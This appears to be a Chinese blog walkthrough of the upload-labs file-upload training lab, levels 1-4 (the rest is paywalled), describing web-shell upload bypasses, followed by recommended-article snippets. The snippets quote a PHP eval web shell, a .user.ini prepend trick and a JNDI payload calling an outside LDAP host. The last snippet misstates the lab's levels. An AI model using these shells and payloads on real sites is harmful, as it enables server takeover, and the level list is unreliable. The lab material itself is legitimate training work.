upload-labs 1-21通关

最新推荐文章于 2025-01-21 21:59:48 发布

知行者11

最新推荐文章于 2025-01-21 21:59:48 发布

阅读量1.3k

点赞数 45

文章标签： web安全

本文链接：https://blog.csdn.net/2403_83724196/article/details/143260222

版权

upload 1-21通关

Pass-01(前端验证)

将含一句话木马的文件修改为jpg后缀，上传并在burp中抓包，将图中所示位置由jpg改为php后放行，复制图片链接到蚁剑可以成功连接
在这里插入图片描述

Pass-02（MIME验证）

修改content-type为image/jpeg，image/png，image/gif任意一种均可
在这里插入图片描述

Pass-03(php3,phtml绕过黑名单)

本pass禁止上传.asp|.aspx|.php|.jsp后缀文件！

可以用php3,php5,phtml等绕过

在Apache的httpd.conf中查找addtype，找到AddType application/x-httpd-php，删除注释符#，添加.php3 .php5等，重启php后生效，
在这里插入图片描述

上传php文件，burp抓包，修改filename为php3，php5等

在这里插入图片描述

连接蚁剑
在这里插入图片描述

Pass-04（.htaccess)

".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv"

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

知行者11

关注关注

45
点赞
踩
32

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【upload-labs】1-21关随文经验总结

helin2020的博客

11-25

2005

这里很明显，就是查后缀，如果在白名单里就重命名文件，所以无法使用双后缀绕过，也没有可控路径来给我们%00截断，而如果不在白名单之内，就会删除我们上传的文件，unlink就是删除文件的函数.这里重点就是它是先上传到临时目录，再判断类型，最后再进行的文件删除，那么这里就是我们的突破口了。对于过滤为空白符，最经典的就是双写绕过了.非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。

2025.1.21——七、[SUCTF 2019]Upload Labs 2（未完成）代码审计|phar反序列化|PHP SoapClient 反序列化触发SSRF|等等

最新发布

2402_87387800的博客

01-24

864

题目来源：buuctf [SUCTF 2019]Upload Labs 2

参与评论您还未登录，请先登录后发表或查看评论

[SUCTF 2019]Upload Labs 2 phar+Soapclient结合

a3320315的博客

02-02

2596

0x01 源码 // admin.php <?php include 'config.php'; class Ad{ public $cmd; public $clazz; public $func1; public $func2; public $func3; public $instance; public $arg1; ...

Upload-Labs通关

m0_64180167的博客

07-26

1052

首先很简单文件上传就是需要用户进行上传文件图片或视频等信息但是如果用户恶意上传木马怎么办？这里由提到了木马。

upload-labs前三关

weixin_51536807的博客

02-10

1299

第一关上传一句话木马试试。被阻止了。查看源码，发现是前端验证，会检测你上传的文件是不是 .jpg .png .gif 类型的。再次上传一句话木马（上传后缀为jpg），再用BP抓包修改后缀为php后放包。不知道为什么，我改完后在源代码中查到的文件后缀仍为jpg。但问题不大，复制地址后使用蚁剑连接时把后缀改为php也可以连接成功。第二关先随便上传一个文件试试。上传成功。那传个一句话试试。报错了，查看提示。 MIME (Multipurpose Internet Mai

upload-labs(完结)

m0_74456293的博客

03-05

190

upload-labs(完结)

upload-labs 1-3关

m0_56135391的博客

04-17

3029

Pass-01 直接上传含有一句话木马的php文件，显示文件上传格式不被允许查看网页源码，将check File的函数删除再次上传该php文件，上传成功复制图片链接，使用蚁剑进行连接，连接成功 Pass-02 查看源码，发现后端php代码只对concent-type进行检查使用burpsuite进行抓包将content-type改为image/jpeg 放包，文件成功上传在蚁剑中输入该文件路径，成功连接 Pass-03 上传php文件，显示不允许上传将文件后缀名

安装upload-labs

10-22

1. 学习文件上传漏洞课程：upload-labs提供了详细的课程讲解文件上传漏洞的基础知识和实践经验，您可以通过学习这些课程来了解文件上传漏洞的原理和防御方法。 2. 根据关卡提示信息练习：upload-labs提供了多个关卡...

upload-labs靶场

09-09

在网络安全领域，upload-labs靶场是一个针对Web应用上传漏洞进行练习和测试的平台。通过利用upload-labs，安全研究人员和爱好者可以提高对各种上传漏洞的识别和利用能力，这对于提升网站的安全防护水平至关重要。...

upload-labs通关手册

12-03

详细记录了upload-labs靶场的通关步骤，并且附带有caidao和burpsuite工具资源，非常适合初学者！！！

SUCTF_2019_部分复现

Lethe's Blog

09-01

5279

Web1 CheckIn 1、进入题目后是一个简单的上传页面：先尝试上传普通的图片马，发现会显示<? in contents!，过滤了<?，可以使用<script language='php'></scrip>绕过。修改后再次上传发现显示exif_imagetype:not image!，还用了exif_imagetype()进行检验，可以加上GIF89a...

【BUUCTF】[SUCTF 2019]CheckIn

aoao331198的博客

04-09

574

废话不多讲，老生常谈的文件上传题目需要传一个图片马 GIF89a <script language='php'>@eval($_POST['abc']);</script> 还有一个.user.ini文件文件上传之.user.ini GIF89a auto_prepend_file=upload.jpg 作用是指定在主文件之前自动解析的文件的名称，并包含该文件，就像使用require函数调用它一样。蚁剑链接 http://c8a6d5ca-0f52-4c27-a06f-

upload-labs关卡2(基于白名单MIME绕过)通关思路

zyh1588的博客

11-03

588

小白回顾upload-labs关卡2基于白名单MIME验证绕过

65，【5】buuctf web [SUCTF 2019]Upload Labs 2

2402_87039650的博客

01-21

722

进入靶场。

[SUCTF 2019]CheckIn

2201_75556700的博客

09-12

302

4、访问网址：uploads/065831472858248584ff4993846d5065/index.php（抓包，看响应）2、先上传.user.ini，抓包，然后放包。3、接着上传test.jpg，抓包，放包。

[SUCTF 2019]CheckIn+[WUSTCTF2020]CV Maker

硫酸超的博客

12-07

737

[SUCTF 2019]CheckIn 源码： <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"

结合suctf-upload labs-RougeMysql再学习

weixin_30376453的博客

08-22

197

这篇主要记录一下这道题目的预期解法做这道题首先要在自己的vps搭建一个rouge mysql，里面要填写需要读取客户端的文件名，即我们上传的phar文件路径先搭一个rouge mysql测试看看： #coding=utf-8#python2.x import socket import logging logging.basicConfig(level=loggin...

buu-day10

anwen12的博客

01-27

2306

0x01 [红明谷CTF 2021]JavaWeb /;/json绕过权限校验,然后漏洞探测 ["java.net.InetAddress","khl16k.dnslog.cn"] ["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}] ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"

Buuctf-[极客大挑战 2019]Upload

m0_63563528的博客

04-20

324

还是不行，出现上面这个提示，说明它还检测了我的文件头是不是jpg。一般我们可以用几何画板随便做一张图片，然后在图片中插入一句话木马，这里我为什么不用呢？因为图片中容易存在<?这个字段而被过滤掉。诶这里发现它还有检测，检查到我的内容有<?，又被拦截了，上网查了一下。

upload-labs靶场1-21通关

08-17

你好！要通关 upload-labs 靶场的第 1-21 关，你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示： 1. Level 1 - 文件上传漏洞：尝试上传一个恶意文件，看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞：尝试利用文件包含漏洞，读取服务器上的敏感文件。 3. Level 3 - XXE漏洞：在上传的 XML 文件中尝试触发外部实体注入。 4. Level 4 - SQL注入漏洞：利用输入点进行 SQL 注入攻击，尝试获取数据库中的敏感信息。 5. Level 5 - SSRF漏洞：尝试利用服务器端请求伪造漏洞，发起内部网络请求。 6. Level 6 - 文件上传漏洞2：绕过上传限制，上传一个恶意文件。 7. Level 7 - 文件包含漏洞2：利用文件包含漏洞，读取服务器上的敏感文件。 8. Level 8 - 反序列化漏洞：尝试触发反序列化漏洞，执行恶意代码。 9. Level 9 - 文件上传漏洞3：绕过上传限制，上传一个恶意文件。 10. Level 10 - 文件包含漏洞3：利用文件包含漏洞，读取服务器上的敏感文件。 11. Level 11 - XXE漏洞2：在上传的 XML 文件中触发外部实体注入。 12. Level 12 - SSRF漏洞2：尝试利用服务器端请求伪造漏洞，发起内部网络请求。 13. Level 13 - 文件上传漏洞4：绕过上传限制，上传一个恶意文件。 14. Level 14 - 文件包含漏洞4：利用文件包含漏洞，读取服务器上的敏感文件。 15. Level 15 - SQL注入漏洞2：利用输入点进行 SQL 注入攻击，尝试获取数据库中的敏感信息。 16. Level 16 - 文件上传漏洞5：绕过上传限制，上传一个恶意文件。 17. Level 17 - 文件包含漏洞5：利用文件包含漏洞，读取服务器上的敏感文件。 18. Level 18 - 反序列化漏洞2：尝试触发反序列化漏洞，执行恶意代码。 19. Level 19 - 文件上传漏洞6：绕过上传限制，上传一个恶意文件。 20. Level 20 - 文件包含漏洞6：利用文件包含漏洞，读取服务器上的敏感文件。 21. Level 21 - XXE漏洞3：在上传的 XML 文件中触发外部实体注入。请注意，在完成每个关卡时，要仔细阅读相关提示和代码，理解漏洞的原理，并尝试不同的方法来解决问题。祝你顺利通关！